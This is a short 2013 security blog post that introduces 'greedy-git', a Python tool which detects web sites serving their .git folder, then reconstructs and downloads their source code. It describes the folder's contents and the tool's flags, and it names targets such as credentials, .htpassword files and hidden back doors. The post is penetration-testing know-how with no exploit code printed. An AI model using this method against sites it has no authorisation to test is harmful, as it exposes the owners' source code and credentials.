Greedy Git

June 23rd, 2013 by Strawp

TL;DR: I wrote a script for enumerating and downloading source code off sites when they accidentally share their .git folder.


I’ve notice a couple of things of late when looking at security testing software:

  1. Python now seems to be the scripting language of choice
  2. It seems to be mostly in not just git, but on github

And the upswing in popularity of git is not just in small projects, but in deploying to web sites too, so much so that it’s now becoming increasingly more likely to find a site that is inadvertently serving the .git folder to the outside world.

With a little work it should be possible to reconstruct a repository remotely (object packs being the only hard part).

Of course, this isn’t a new problem – SVN has the same issue – but the fact that it’s slightly harder to parse that git metadata means it’s a nice opportunity to finally take the plunge and write some Python and learn more about git.

What’s in the .git folder?

  • an index file which, like SVN is effectively a database of all files in the project against hashes of those files. Unlike SVN, it’s in memory map format, which is much more fiddly to write code for
  • The entire site source code, reference by an SHA1 hash, compressed using zlib deflate
  • Logs of git actions such as commit in logs/HEAD
  • A small config file which is a good starting point to test if a .git directory is present or whether the site is configured to return 200 OK for any URL requested as it returns a very predictable format

Analysing the .git folder

As a starting point, to avoid having to parse the index file myself, I forked gin – a neat little index file parser written in Python. This already produces a readable and JSON encoded version of the file which I can then use to iterate over the files. The script looks at:

  • File extensions. Count which file extensions are the most popular. This tells us what our site is written in, if it wasn’t already obvious
  • “Interesting” files. Archive format files, backups, SQL, “hidden” files (beginning with “.”) such as .htaccess and .htpassword, files which might have DB configurations in them etc
  • The logs/HEAD file for emails and credentials stored in URLs

This then dumps this information out into a simple flat text interesting.lst file, a report.md file, containing the results of the above scan, a copy of index in its native format, readable text, json, and flat text and copies of config and logs/HEAD

Being a greedy git

At this point, you already have quite a lot of powerful info however if the script has managed the above, it will probably also be able to download the source code for the site. Since we’ve already determined a lot of interesting files in interesting.lst, we can use that (edit it and add to it) to download all those files to our computer. In git, the compressed source for a file (in “loose” format) is stored in .git/objects/ and is referenced by the SHA1 hash of itself. We have that hash, so we can try and download files.

Passing the “-I” command line argument to greedy-git will make it attempt to download everything in interesting.lst to ./files/ in the current working directory. If you really want to go overboard, you can pass “-a“, which will get as much of the site source code that it knows about, and passing “-g [remote/file/path]” will download just that file, or matching file pattern.

You now have a target site’s juicy source code. This could contain database or other credentials, clues to vulnerabilities or “security by obscurity” style back doors that the developer thought no one would find. All this is now just a few grep commands away.

Do use responsibly, and let me know if there is a way of guessing the pack file name – that would be the keys to the kingdom…

Comments are closed.